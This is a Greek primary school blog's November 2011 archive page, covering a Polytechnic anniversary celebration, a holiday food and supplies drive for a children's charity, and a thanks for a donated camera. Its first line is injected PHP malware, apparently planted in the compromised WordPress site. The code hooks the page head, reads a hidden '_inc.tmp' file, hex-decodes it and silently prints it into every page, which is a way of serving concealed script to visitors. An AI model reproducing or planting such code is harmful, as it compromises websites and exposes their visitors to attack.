if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Νοέμβριος, 2011 |

Monthly Archives: Νοέμβριος 2011

Σχολική γιορτή, επέτειος Πολυτεχνείου 17/11/2011

Μία άποψη του χώρου από την σχολική γιορτή μας για την επέτειο της εξέγερσης του Πολυτεχνείου.

Δημ. Σχ. Λεωνιδίου
Λεωνίδιο 17/11/2011

”Χαμόγελο του Παιδιού”

Σας ενημερώνουμε ότι ο Εθελοντικός Οργανισμός για τα παιδιά «Το χαμόγελο του παιδιού», δεδομένης της ιδιαίτερης οικονομικής και κοινωνικής κατάστασης που βιώνει η χώρα μας και ενόψει των εορτών των Χριστουγέννων, επιθυμεί να συγκεντρώσει τρόφιμα και είδη πρώτης ανάγκης για να καλύψει τις ανάγκες των παιδιών που διαμένουν στα 11 σπίτια του Οργανισμού.

Προκειμένου ο ανωτέρω Οργανισμός να ξεκινήσει την κινητοποίηση για την συγκέντρωση των τροφίμων και ειδών οικιακής χρήσης, θα ήθελε και πάλι να έχει αρωγό στην προσπάθεια αυτή τους μαθητές Π/θμιας και Δ/θμιας Εκπαίδευσης.

ΕΝΔΕΙΚΤΙΚΗ ΛΙΣΤΑ ΠΡΟΪΟΝΤΩΝ

–          Είδη υγιεινής ( σακούλες απορριμμάτων, απορρυπαντικό πλυντηρίου ρούχων και πιάτων, απορρυπαντικά γενικής χρήσης)

–          Είδη οικιακής χρήσης ( χαρτί υγείας, χαρτί κουζίνας, αλουμινόχαρτο)

–          Συσκευασμένα είδη τροφίμων( μπισκότα, άσπρο ή κίτρινο ρύζι, σάλτσα, ντομάτας, δημητριακά, μπαχαρικά, αλάτι, ξύδι, όσπρια, κρουασάν, μέλι, μαρμελάδες, πουρέ, φρυγανιές, βρεφικές κρέμες, άνθος αραβοσίτου, ζυμαρικά όπως κριθαράκι, κοφτό μακαρονάκι, μακαρόνια κ.λ.π, αλεύρι, ζάχαρη, κακάο, χυμούς )

Το Δημοτικό Σχολείο Λεωνιδίου θα λάβει μέρος σε αυτήν την προσπάθεια με προαιρετική συμμετοχή των μαθητών. Η συγκέντρωση των προϊόντων ( στο χώρο του Σχολείου)  θα πρέπει να έχει ολοκληρωθεί έως την Παρασκευή 9-12-2011.

Ο Σύλλογος Διδασκόντων

Ο Σύλλογος Γονέων και Κηδεμόνων

Ευχαριστήριο

Ο Σύλλογος Διδασκόντων και οι Μαθητές του Δημοτικού Σχολείου Λεωνιδίου ευχαριστούν  τον κ. Φαλκονάκη Αλέξανδρο για τη δωρεά στο Σχολείο μας μιας ψηφιακής φωτογραφικής μηχανής